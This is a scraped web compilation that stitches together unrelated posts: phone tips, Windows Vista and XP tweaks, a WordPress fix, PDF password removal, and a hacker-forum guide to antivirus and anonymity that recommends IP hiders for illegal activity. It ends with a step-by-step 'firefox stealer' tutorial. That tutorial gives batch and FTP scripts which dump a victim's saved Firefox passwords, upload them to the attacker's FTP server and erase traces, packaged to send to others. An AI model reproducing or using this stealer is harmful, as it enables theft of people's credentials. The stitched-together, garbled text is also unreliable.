15. Send out invitations. Do you have an event you need to send out invitations for but don’t have the time to spend writing them out? 16. PayPal Mobile is a fantastic way to send and receive money when it is urgently needed and you cannot get to a Western Union or a bank. Though you do need to set up an account in advance, it is a security measure which will bring you piece of mind. You can use text messaging to pay for services you might need as a stranded motorist or when you are traveling. 17. Play games. Games have become a staple in the mobile device market. Where once cell phones had one or two games installed on them ready for time of buy, most cell phones now come with a couple of pre-loaded trial versions of various games. The thought is to let you try it out with the hope that playing the game will be so enjoyable you will be compelled to buy it. But for the fiscally challenged and/or responsible, the extra data charges by the carriers may deter them form purchasing games. Nokia N-Gage provides an alternative, they are selling their games directly to the handsets and allowing the purchaser to download the game on their PCs then transfer them to the cell phone handset with a USB cord or even with a Bluetooth. Though it may cost a small extra to buy one of these devices, if you spend a substantial amount of time on the run and find keeping your cell phone charged to be a challenged, it may be a valuable buy.

20. Use it to study. Your cell phone can be used as a study tool. Many cell phones are equipped with a voice recorder. You can record terms you need to memorize onto your phone for play back. Since you can pause a voice recording, just hit pause before the answer is repeated to allow time for you to give your answer. Or you can only record the terms and/or questions on your recorder and have the answers written on a piece of paper. This gives you the opportunity to answer the audio question without worrying you might see the answer before you get a chance to test your knowledge.

Then there is always the possibility of butt dialing which can lead to a conversation being overheard that may have been better off kept private.

23. Conference calls. The three way call option on your cell phone isn’t just a feature added for the benefit of a gaggle of thirteen year ancient girls. This feature can also offer a benefit to working adults. You can use three way calling to initiate a conference call for work. You can use it to help plot an event or a night out with other people. It is much simpler to discuss the plans all together than to ping pong calls back and forth to nail down the availability and preferences of everyone involved. Life is very hectic. Any time you find a way to make it a small bit simpler you have to take advantage of it. Cell phone service providers now offer a wide variety of services that do just that. Most people are generally familiar with the applications offered for the iPhone. Other cell phones offer similar types of tools which can be installed onto your mobile phone for a small monthly fee. You can find everything from news to party games to your own personal chef. Here is a list of some of the top tools being offered.

24. Spb Mobile Shell_WM is a tool which offers a variety of benefits. It integrates all of the features and tools you have on your cell phone into an simple to access menu. You can customize the menus and screens to suit your preferences and needs. Place all of the features you use regularly on the today screen so everything you generally use several times throughout the day will be grouped together in one place. How to Install MUI Language Files in Windows Vista

Multilingual user interface (MUI) language packs in Windows Vista enables users to change the language Windows uses to show text in wizards, dialog boxes, menus, and other items in the user interface. Every Windows Vista system really run on a show language that installed while setup Windows Vista. To change or switch to other different show languages, additional MUI language packs have to be installed.
Users can download and install additional language packs via Windows Update (only Windows Vista Ultimate and Windows Vista Enterprise editions have license and rights to install more than one copy of MUIs), or if these MUI language pack files already been downloaded on to the computer or on Windows DVD, use the guide below to install the new show language.

How To Install a Multilingual User Interface Pack (MUI)

Click on Start Menu, then go to Control Panel.
Click on Clock, Language, and Region option (or Regional and Language Options icon in Classic View).
Click on Install or uninstall show languages under “Regional and Language Options”. For users on Classic View, click on Keyboards and Languages tab, then click on Install/uninstall languages under “Show language”.
Enter administrator password or click on Continue when prompted with User Account Control dialog by Language Pack Installer.
In the Language Packs Installation and Uninstallation wizard, click on Install languages.
Then type or browse to the folder that contains the language pack files. The language file must be in .CAB extension, typical named as “lp.cab”. Note that you just need to specify the top level folder that contains the language files, regardless of the level of folders nested. Language pack installer will search recursively.
Once selected the folder, the installer will scan the directories and list all languages available to install, together with native name, type (MUI or LIP) and size.
Select and tick the check boxes of all languages that want to be installed. (really, the check boxes are checked by default, so you should untick and uncheck the check boxes of show languages that don’t want to be installed)
Click on Next button when ready.
Click on radio button for I accept the license terms, then click on Next button.
On the summary page on which language(s) will be installed, click on Install button.
Wait for the installation to end, which may take a while. A restore point will firstly be made.
Once all selected language files is installed successfully, a confirmation screen will be shown. From here, click on Close button to exit, or check the Change my show language to option, then select a language set from the drop down list, optionally choose whether to apply changes to system accounts (will change the language on Welcome Scree etc.), and then click on Log off to logout and login again to use Windows Vista in new show language.

Note: The Show language section will only be visible if you have already installed a LIP or on Windows Vista Ultimate and Enterprise editions that Windows supports MUI.

How Fix WordPress 2.5 Image or Media Flash Uploader Not Working Issue in IE7

WordPress 2.5 uses a new Adobe Flash based Image and Media Uploader which supports ability to upload multiple files at one go with upload progress bar. But, a lot of bloggers and users encounter problems when using this new “Add Media” wizard dialog.

In Internet Explorer 7 (IE7), when opening the “Add Media” Uploader dialog, the uploader using Flash technology was absent or not showing, and instead be replaced with the standard “Browse File” input box with script errors, as described in WordPress Trac.

The reason of the issue is due to two script errors that do not compatible with IE browser. Developers of WordPress have came out with solution to fix and patch the issue, which will be updated in WordPress 2.5.1. In the meanwhile, before version 2.5.1 is released, for those who wants to use IE7 to use the new Flash Media Uploader can download the changeset_r7573.zip which contains the following 2 files:

wp-admin/includes/media.php
wp-includes/js/swfupload/handlers.js

Replace these two files in the location above and overwrote by the new downloaded files will fix the IE7 and WordPress 2.5 Flash based image and media uploader issue.

Another bug is related to ctype_digit() function. If using the Flash uploader is too much distress, disable the Flash media uploader with this plugin.

How to Install and Use Windows Vista Ultimate Extras Sound Schemes (Pearl and Glass) in XP

Windows Vista Ultimate Extras gives away two free sound schemes for Windows Vista Ultimate customers who can download and install the sound packages from Windows Update. The sound scheme package of either Ultimate Extras Pearl or Ultimate Extras Glass, when enable, customize and change the sound and notification tune that Windows plays when user performs a task and an event happens in Windows and supported application programs.
The Windows Sound Schemes standalone update package downloadable from Windows Update server using the direct download links to the executable can be used to install the additional sound schemes to all Windows Vista editions, even though they’re not entitled to Ultimate Extras privilege. But what about Windows XP? You hear the sound from friend’s Vista computer or your another Vista computer, and like the sound, but you’re using Windows XP.

If you want to install Ultimate Extras Windows Sound Schemes consisting of both Pearl and Glass, use the following trick to download and install the sound schemes into Windows XP computer. The hack works on Windows XP Home and Professional edition, and regardless of service pack installed.

Firstly, download the Windows Sound Scheme standalone setup installer from Windows Update using direct download link for the sound schemes. Then use WinRAR to extract the content of the Windows Sound Schemes setup installer to a folder.

Download the following patched UltSound.inf (inside UltSound.zip). Use the patched UltSound.inf to replace and overwrite the original UltSound.inf in the extracted folder.

Finally, right click on the patched UltSound.inf, which is now supposedly in the folder together with other unpacked Windows Sound Schemes files, and click on Install. The Copying Files dialog with progress bar will be showed to indicate installation process. Once the dialog disappear, installation is done.

Now to go Control Panel -> Sound, Speech and Audio Devices, and then click on Change the sound scheme link to open Sound and Audio Devices Properties. From the Sound Schemes drop down list, select either Ultimate Extras Glass or Ultimate Extras Pearl to apply the new customized sound schemes to Windows XP PC.

Remove Password and Unlock Protected PDF Which Allowed To Be Printed

Acrobat PDF documents can be protected or locked with password to secure the confidential and private by restricting others from opening the PDF file altogether by PDF creator, or limiting ability by readers to modify, print, copy or extract text and graphics from the PDF contents. The later case, where printing is allowed, but copying is not allowed, has an simple workaround that can unlock and remove the password protection.

Removing the password is useful if you have legal rights or are genuine owner to the PDF documents, but forget the password. The hack only works to disable the password protection if the PDF file’ security settings has password protected from allowing readers from modify or copy and paste, but allow users to print the document.

To remove such password which restricts users from content copying or text and image extraction, try to print the PDF document to a PDF printer or save as a new copy to make another PDF document stripped of the password protection. You will get another PDF document and it will be password-free. But, the new PDF document will probably treat its contents as a set of pictures, rather than text.

If you don’t have any PDF printer or creator, download and install PrimoPDF which installs a PDF virtual printer.

PDF Unlocker can do the job more efficiently.

Being a hacker, you’re coming face to face with some of the most malicious programs on the internet every day. You want to be secure. Most of the programs you’ll be downloading will be malicious, so how can you tell if the program will be working against you or for you?
This guide will be looking at the scanning of malicious files, as well as a guide to anti-viruses & firewalls and a brief introduction to sandboxing and anonymity. So yep, you’re in for quite a bit of reading. Grab a drink, maybe a cigarette.
Being secure is vital. Just because you call yourself a hacker, it doesn’t mean you’re immune to attacks towards your computer. Without my anti-virus, I doubt I’d really be typing this now – I’d probably be searching through my registries and screaming like a chicken on speed. I’m like that.
Not all anti-viruses work the same way. Some anti-virus programs are terrible; some are excellent, and some are just plain useless. We’ll be looking at which ones are the best of the best, and which ones are just plain fail.
Being infected with something can also place your friends and family at risk, other users of your computer could be having their login & credit card details stolen without any knowledge of it. Worms can also spread to your email contacts and friends on well loved websites such as Facebook.

Downloads & Scanning
For example, you download a program and the poster is claiming that it is a clean botnet controller. If we can this, it will come up with results such as “Win32/RBot” etc.. This means that the file should be what we wanted.
Now, if the botnet-controller scan came up as something like “Win32/trojan.agent.a”, we can tell that this is a malicious program that will work against us. This is an example of a download you do not want to use.
All in all, the scan should show results similar to what you were downloading.
You should always be careful what you download. You may often be downloading malicious software without even realizing sometimes. Trust me, this happens to a lot more people than you reckon.
If you’re expecting a file to be much larger than the download you find, don’t touch it. An example of this would be “Windows XP

Theme – 350kb!” when it should be a lot higher, such as 30-50mb.
Remember to always check the names of the files you download.. If you’re downloading a cracked program, it would be unusual for it to have no credits or advertisements in it. I would trust ” ‘x’ cracked by ‘y’ ” more than I’d trust ” ‘x’ crack”. Credits, names or advertisements should nearly always be in .rar or .zip files, this is one excellent way of recognizing a trusted download.

Downloading really isn’t necessary and is often risky, but we have some clean content in the HF-L33t section if you want to upgrade for that.

Online File Scanners
Web-scanners such as “VirusTotal” and “NoVirusThanks” are becoming increasingly well loved with the amount of anonymous downloads posted all over the internet.
If you want to scan a file you find suspicious, you can go to either http://virustotal.com or http://novirusthanks.org to do so.
VirusTotal will send samples of the file to the antivirus companies, so this is not recommended if you want to keep your file undetectable.
NoVirusThanks has an “Advanced options” area where you can choose to not distribute your file to the antivirus companies, this is handy for keeping things fully undetectable, but if it’s a file you don’t trust and don’t want yourself or others to be infected by it in the future, I suggest you allow them to distribute it to the antivirus companies. I respect what these websites and the malware fighting websites do, and so should you.

Visiting Websites & Reading Emails.
Be cautious of the websites you visit. I wouldn’t recommend visiting any websites that seem cheap, uncommon, or freely hosted. Malicious websites are often misleading or can just inject things into your system without your consent. If you use the “Chrome” browser from Google, you may have noticed that it automatically downloads files without prompting you. Chrome is a browser I would not recommend just because it is so new, all new things have vulnerabilities, and if a vulnerability can be exploited, it will be exploited.
I’m behind a firewall and anti-virus anyway, but the only websites I visit are well loved ones. The untrustworthy and uncommon websites usually don’t appeal to me, for obvious reasons..
When opening emails, you should also be cautious. Just because it’s an email from your friend – it doesn’t mean you can trust it! You may see some emails asking you to update your bank details — your banks should never question you to do that via email. The details you enter will be sent out to someone who is going to exploit your details, so steer away from these emails.
Worms can be spread via email. For example, you open an email from Bob containing a worm, this worm is then sent to all of your contacts. This is how most worms will work, and it is suggested that you change your emailing service if it could be vulnerable. You can use Microsoft’s live hotmail service which is brilliant, it will also disable any harmful content from downloading onto your computer. You can find this service at http://mail.live.com

Sandboxing
By using a sandbox, everything that is downloaded onto your computer will remain in the sandbox. It will not escape, meaning that malicious downloads cannot harm your computer. Sandboxing is a fantastic way to test whether or not a website can be trusted. I rarely do this, but it’s so useful sometimes.
Sandboxing will also protect your cookies, history and cached temporary files from being leaked. Downloads are isolated, meaning that they are trapped and your computer is protected.

Firewalls
The excellent antiviruses will have a built-in Firewall, but if not, then it may be worth downloading one. Firewalls aren’t essential, but can help a lot.
Some firewalls have IP masking options, but these can usually slow down your computer and are not worth using unless you’re doing something illegal.
The main use of a firewall is to prevent incoming traffic, which will stop things like ‘telnet’ from reaching your connection, and can also stop worms etc. from accessing your network. Firewalls will also block the backdoors that trojans make, so if you find yourself unlucky enough to have a RAT (Remote Access Trojan) on your computer, the backdoor should be blocked by your firewall, but it is possible for a trojan to bypass this. Having a firewall does not mean you are secure, many firewalls can be easily disabled or bypassed by malware. Some firewalls will also block legit connections, such as downloads for software. Do not reckon you’re secure just because you have a firewall, this is a common misconception with firewalls. Too many people reckon that by installing a highly well loved firewall, they’ll instantly be secure against the latest intrusions, but this is not at all right.
Firewalls may also make an effect on your connection speed. If you have a very quick download speed, you may notice a difference when you get a firewall, but the download speed may remain normal on users with slower speeds. This effect can vary between users, and depends on the connection. It’s best to try several firewalls to find out which one suits you best – reviews are personal and will not always be the same for everyone.
One of the favourite firewalls is “ZoneAlarm” which is very well loved and has a free version. The paid version is obviously better, but it isn’t necessary at all.
If you’re using Windows Vista, I’d recommend choosing ZoneAlarm as your firewall. The same goes for XP, but you might want to get your hands on a “BlackIce” crack instead, if possible.

Antiviruses
An anti-virus program is essential. You honestly shouldn’t go without one. If you don’t have one, there is a list of downloads and recommendations in the next post. Don’t be worried about the anti-virus slowing down your computer, if you get the right one then your computer will remain at maximum performance.
You want an antivirus that will scan your RAM and system folders constantly, because then you will be alerted if something harmful has been found in them. The average antivirus will only scan and remove when told to, but the best ones will scan constantly, update daily, and give plenty of tweaking options to fit to your preferences.
If there are malicious programs that you want to download such as Metasploit, it is best if you have an antivirus that will allow you to do so. Some antivirus programs will give you no option and will quarantine the file straight away, but others such as Kaspersky will give you the option to clean, remove or ignore.
Viruses can sometimes fully disable your protection, but the stronger programs such as Nod32 can withstand this and will be unclosable. You want something tough if you’re going to be downloading riskware.
A excellent anti-virus will also constantly scan your downloads and running processes. Hopefully you are able to know now why these are essential.
If you want to run more than one antivirus, you must find a combination that works. If you have a excellent antivirus, you won’t need to. Infact, you shouldn’t ever need to run more than one. I remember having Kaspersky running while I installed Nod32, my PC growled. :3 The only antivirus-related programs I have installed at the moment are HijackThis, ComboFix and NOD32. I like to use HijackThis to see what’s running on my computer, and I always keep ComboFix just incase, you never know what’s round the corner…
I remember having no antivirus software installed whatsoever, and then I received a rootkit that wouldn’t let me download any software.. I got rid of them eventually, but it wasn’t simple, the rootkit wasn’t detected by most AV’s because of it being so new/rare – you still can’t find it on a few of the AV databases! But I do wish I had it again, so I could send it out as a sample.
I will be listing my favourite anti-viruses in my next post. I strongly recommend you stick to these, as there are many fake ones that you can be easily lead to. Remember to look things up before downloading them. Pick wisely! :3

Essential Additions.
There’s a few more tools which I’m sure you’ll definetely want to get.
HijackThis is a tool used to scan the areas of your computer which viruses are often located in. It will also scan the registry areas which hold the legitimate programs and, quite often, the infections. It is best not to delete (’fix checked’) any entries on HijackThis unless you know what you’re doing, as you may be removing something which is a required part of your system.
Another excellent thing about HijackThis is the fact that it’s so lightweight, it uses barely any memory, it’s simple to use, and you don’t need to keep it running!

Browser Protection
There are several fantastic addons for browsers which you can get to protect you from malicious websites.
If you use FireFox, look for “WOT” and “NoScript”, WOT will give warnings before you visit a website, and NoScript will disable malicious scripts from running when you visit a website.
If you use Internet Explorer, look for “IE-Spyad”, IE-Spyad will redirect you away from malicious webpages and guard you from over 5,000 different URL’s.
I’m also working on my own plugin, which you can expect to see in a few months. This will be for IE only, until I fully figure out how FireFox operates.

Okay, now that you’re protected (well, I hope you are), it’s time to be invisible…

IP Hiders
You can get some fantastic IP hiders to keep you anonymous.
A personal favourite is “Hide-The-IP”, which allows you to select the proxy and choose the speed of the one you want.

There are many fabulous IP hiders out there which can be found, and these are a must if you’re going to be involved in any illegal activity.

Tor: Anonymity Online
You may want to download “Tor” and TorButton for FireFox. This is a program which will select a proxy for you and allow you to spoof your connection by using that.
TorButton is a FireFox addon which allows you to change your proxy quickly by clicking the button. This is a fantastic tool, and another excellent reason to download FireFox!

Personal Details
Okay, you may want to give out your name and things on your Facebook or MySpace, but if you do, it’s wise to use an alternate alias. If someone searched your hacking alias in Google, they’d probably be able to pick up a lot of information on you from that. Reckon about the name you choose before you choose it, and make sure you don’t over-use it – only use it where you reckon you should. Don’t complain about not being anonymous if you’re going to splurt out your details everywhere, you can’t expect to stay hidden if you’re going to give yourself away without realising. Remember that.

Keeping Software Updated
Software should always be kept updated. This is vital. Most security experts will tell you that updating your software is more vital than having an antivirus, because malware finds flaws and vulnerabilities in software that it can exploit.
This is what should always be kept fully up to date:
Your operating system (e.g. updating from Windows XP SP1 to SP2).
Java.
Browser.
Antivirus.
Firewall.
Instant messaging or email applications.
Any other software which could be exploited.

Active Thinking
Many scams and computer infections require your consent, so you should always be wary. If something doesn’t quite look right, make sure to research it. Many people are fooled into giving away their details by fake emails from companies such as banks, social networking websites, etc. You shouldn’t believe everything you read. Many scams will lead you on, so you just have to watch out. Keep everything you’ve learned from this guide in mind, and you’ll be safe.

Passwords
Though it is also vital to have a password you will remember, you should also be sure that it can’t be guessed. If it’s a site containing personal information, I suggest you change your password once a month. A excellent password would contain letters, numbers and symbols – maybe even words in a foreign language if it helps! An example of a excellent password would be “A$fao4iz3Â£p” not “John1982″ or “ilovefootball”. Passwords should be different for each website you use, because if someone hacked into a forum, for example, and took your details – potentially, they could have access to your PayPal account, Facebook, etc.

How to build a firefox stealer

Just follow the steps below..

1. ok lets start by downloading passwordfox… password fox is a simple program that shows you the ff password on the system.

its the only thing you will have to download… the rest is all you.2. make a text file named test.txt and place this in it

@echo off
cls
ftp -s:test.txt
rmdir /s /q “C:\temp1″
exit

close and rename test.txt to test.bat
^^ for those interested i will clarify what it does if you arent skip to step 3
@echo off (hides the next lines from user)
cls
ftp -s:test.txt (we will make this file later with your FTP server details)
rmdir /s /q “C:\temp1″ (deletes the folder with all the stealer files)
exit (duh)

3.make a file named launch.txt (which will be renamed to launch.bat)
and place this text into it

start passwordfox.exe /stext passff.txt
CHOICE /C:x /T:x,2 > NUL
start /min test.bat

^^
start passwordfox.exe /stext passff.txt (runs passwordfox and generates a txt file with the ff passwords)
CHOICE /C:x /T:x,2 > NUL (waits 2 seconds)
start /min test.bat (starts the file we made in step 2 minimized)

4.make a file named test.txt we will NOT rename this to bat.. it will stay txt

open ftpdotserverdotcom (replace with your FTP details, i use 000webhost)
ftp username
ftp password
cd ff (remove this line if you dont make a directory in your ftp account named ff)
place passff.txt
quit

at this piont you should have all your files you made and downloaded in one folder all by itself

5.now we will make a self extracting archive.. i used WINRAR (look it up and use the 30 day trial they dont make you buy it anyway)

EDIT!!! WHERE I PLACE “C:/temp/launch.bat” CHANGE THAT TO C:/temp1/launch.bat IF YOU DONT CHANGE IT IT WONT WORK!!!

make sure you do this too

then do this

then hit ok then ok
your file should then be there where your other file are now… all you have to do is send the 1 file you last made to somebody and check your ftp account…

keep in mind that it will overwrite the password file everytime somebody opens the file so you will have to make ones with changed txt file names .. or just to keep it simple.. send it out one at a time and download the password file before giving it out again… i might have confused everybody but whatever…..
